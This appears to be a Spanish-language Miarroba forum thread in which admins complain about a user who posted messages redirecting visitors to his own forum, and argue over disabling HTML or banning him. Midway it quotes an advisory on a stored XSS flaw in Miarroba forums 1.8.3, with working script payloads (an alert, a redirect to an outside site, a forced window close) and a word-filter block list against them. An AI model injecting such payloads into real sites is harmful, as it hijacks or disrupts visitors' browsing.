Mi foro: http://miarroba.com/foros/ver.php?id=216702

El usuario KaOz_Venez0lano, http://miarroba.com/foros/perfil.php?foroid=216702&id=1342287 , ha respondido 2 mensajes en el foro y cuando intento entrar me linkea a otro foro (http://miarroba.com/foros/ver.php?id=473965) que seguramente es su foro.

Algun admisntrador de mi@ podria borrar esos mensajes y darle un toque de atencion a este individuo indeseado?

GRacias.

Borrados. Sin hacer nada. Pero me preocupa que puedan volver a entrar.....

en tu panel de administracion, desactiva todo lo que es codigos html, mi@. y Flash. espero te sirva eso, y borra los postings que el hizo..

Hola a tod0s primera mente nadie esta hackiando a nadie a mi tb me borraron muchos post y yo me tube ke kedar kieto ademas solo los ayudo diciendole ke desactiven el html no tengo nada en contra de nadie solo kiero mi foro trankilo y ke me dejen en paz....


y ke viva la comunidad de mi@ ok bn... chao

A MI TAMBIEN ESTE KAOZ_VENEZOLANO ME ESTA JODIENDO!!!!!!! HABIA CREADO UN TEMA SOBRE ESTO EN ESTE MISMO FORO PERO EN OTRA PARTE http://miarroba.com/foros/ver.php?foroid=9109&temaid=2242310


CREO, QUE A PESAR DE QUE HAYA SOLUCIONES, A TODOS LOS ADMINISTRADORES NOS JODIO LA MISMA PERSONA, O SEA, KAOZ VENEZOLANO!!!!1 QUIZAS NO HIZO NADA, PERO TODOS LOS USUARIOS TENEMOS EL MISMO PROBLEMA CON LA MISMA PERSONA!! CREO QUE TENDRIAN QUE HACER ALGO LOS MODERADORES DE MI@RROBA!!!!!

NO.. YO CREO QUE LA SOLUCION SERÍA, SI ES QUE SE PUEDE, BANEARLO DE MI@RROBA!

UNA ADMINISTRADORA QUE TENIA UN FORO RE BUENO SE TUVO QUE CAMBIAR DE FORO PORQUE ESTE TIPO LA MOLESTABA TODO EL TIEMPO!

bue.. pero eso de hackearle el foro no es la solucion.. si hacemos eso, estamos bajandonos al mismo nivel que este kaoz venezolana..

y eso de tener que desactivar el html no creo que sea lo correcto!!!! para algo esta la opcion.. no para que venga un tipo y se nos ponga a molestar a todos!

GRACIAS SHAKI POR LO Q HAYAS HECHO JEJEJEJE!!!!POR AQUI SE TE ESTAN RIFANDO!!TEN CUIDADO SI SE TE OCURRE PASAR POR ESPAÑA!!!JEJEJEEJ
GRACIAS POR LA MANITA!!

(SIENTO LO DE LAS MAYUSCULAS PERO SIEMPRE HABLO ASI!!!!)

pero es re cualquiera!! desactivo todos los codigos html por solo una persona que esta haciendo quilombo?? tendria que desactivar a la persona, no a los html!!

LO SIENTO TIA PERO YO NO TE ME ESTOY RIFANDO ASI Q EL MAS GUAPO YA NO GANA!!!!!JIJIJIJIJI

A ZOLTAN NO LE HAGAS CASO Q ES JULAY!!!TU HOMBRE ES WOLFO!!!!.........POR LO MENOS ES EL Q MAS PACIENCIA TIENE!!!!JIJIJIJIJIJIII(Q CABROOOOOOOON)
JIJIJIJIJIJIJIJIJIJI

Hola Shakira, yo soy el que ha ganado la rifa, que sepas que siempre me has molado, desde el momento en que vi tu foto, o sea, hace un ratillo

También que sepas que he sido yo el que ha ganado la rifa asi que te estoy esperando. Un besazo

LOOOOOOOOOOOOOOOOL!!!!CORRE KILLER SE TE ESCAPA EL AUTOBUS!!!JUASSSSSSSSSSSSS!!!!

uhm negativo yo solo trato de ayudar porque a mi tb me hisiseron lo mismo y yo tube ke desactivar el html por ese motivo perdi mucha info y tiempo y dedicacion asi ke porfavor no vengan usteds a decirme ke yo soy el emergumeno y la rata y todo eso porque yo solo kiero estar trankilo con mi foro para eso le e dedicado tiempo y dedicacion

asi que porfavor no tomen una decicion de esa la cual estaria mal porque a mi tb me paso y solo keria ayudarlos diciendole ke desactivaran el html....


oftware: miarroba foros
Versión: 1.8.3
Vulnerabilidad: XSS, inyección de código JavaScript.
Tipo: Remoto
Estado del responsable: Avisado. Sin Solucionar.
Nota: Sólo es posible en foros con la opción "Usa HTML".

miarroba.com es un sitio para el uso gratuito de recursos para webmasters.
Entre ellos encontramos los foros miarroba versión 1.8.3.

1. Vulnerabilidad.

El problema esta en no filtrar o detectar el tipo y sintaxis utilizada en los
mensajes de tipo HTML. Con esto, queda claro que sólo afecta a foros cuya
configuración permita insertar código HTML en los mensajes. Lo cual hace que
de igual insertar <strong> a <script>, pudiendo así poder inyectar código
'malicioso'.

2. Ejemplos (Exploit).

1. Alert, el más sencillo e inocente:
<script>alert('POF');</script>

2. Redirección.
<script LANGUAGE="JavaScript">

var pagina="http://blackscorpion.st"
function redir()
{
location.href=pagina
}
set*imeout("redir()", 1000);

</script>

3. Cerrar ventana. SIN MENSAJE DE CONFIRMACION.
<script language="javascript">
alert('POF. Bye');
function cerrar()
{
set*imeout("javascript: window.opener=''; window.close();",1000)
}
</script>


<body onLoad="cerrar()">

NOTA: Aún así funciona, <body> cargará la función.

soluciones :
1) cargar en el filtro la mayor parte de los codigos maliciosos que se encuentran en la web sin que tenga la necesidad de desactivar la opcion de html a los usuarios

a.1)entrar al panel de control de miarroba.com osea en la administracion de los foro

b.1)entrar en el filtro de palabras y agregar particulas de los codigos maliciosos que automaticamente no se podran activar como son :

<script>
</script>
LANGUAGE="JavaScript">
<BODY onLoad =
<script language=

o.k entre otros que se podrian agregar para que no aya que desactivar la opcion de html en el foro

c.1)la mayoria de los codigos no entraran en las opciones de palabras filtradas ya que apareceran como vacio ya que estamos montandolo con "<>" que mostrara que es elemento de html osea una "etiqueta" asi que asemos esta trampilla copiamos "x" palabra en la opcion la grabamos y la modificamos luego para que identifique en la bace de datos y pueda entrar..je,je...

d.1)luego nos bamos al panel de control de nuevo y activamos en (seguridad) modificas estas dos opciones
a- activar filtro de palabras
b-Nivel minimo para que no filtraraqui podrias poner el nivel de adceso de estas palabras a moderadores y al administrador)

y listo problema resuelto...


ah porfav0r no se olviden ke a mi tb me borraron todo y me jodieron el foro TOMEN EN CUENTA ESO TB... ustedes no son los unicos...

sip.. opino lo mismo que shaki.. porque te lo hciieron a vos, a vos te da permiso para ponerte a joder a todo el mundo???? o sea ue deja de decir esa boludez de que te lo hicieron a vos.. "a mi me robaron, por eso, el otro dia le robe a otra persona"?? que tiene que ver????


"yo quiero estar tranquilo con mi foro"... por eso, me meto a 10 foros, escribo 11 mensajes en distintos subforos haciendo propaganda de mi foro!! y ademas, jodiendo con el html!!!